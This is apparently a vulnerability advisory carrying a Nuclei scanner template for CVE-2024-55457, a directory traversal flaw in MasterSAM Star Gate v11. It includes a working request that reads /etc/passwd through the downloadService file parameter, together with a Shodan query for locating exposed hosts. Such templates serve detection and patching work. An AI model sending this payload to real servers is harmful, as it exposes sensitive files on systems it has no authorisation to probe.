MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
PoC代码[已公开]
id: CVE-2024-55457
info:
name: MasterSAM Star Gate v11 - Local File Inclusion
author: DhiyaneshDK
severity: high
description: |
MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.
reference:
- https://github.com/h13nh04ng/CVE-2024-55457-PoC
- https://x.com/cyber_advising/status/1876034270852231257
classification:
epss-score: 0.78319
epss-percentile: 0.98994
metadata:
verified: true
max-request: 1
shodan-query: html:"MasterSAM"
tags: cve,cve2024,lfi,mastersam,v11,adama,vkev
http:
- method: GET
path:
- "{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd"
matchers:
- type: dsl
dsl:
- "contains_all(header, 'application/octet-stream', 'filename=')"
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 490a0046304402207f1221e5142093f6061fd01b5b280709fd0c17fc2ef64be804581af696cbed40022079ce1daa02c208470abb648fc0c9d46d0df48ba2f4d614b7f7c0c89c89642284:922c64590222798bb761d5b6d8e72950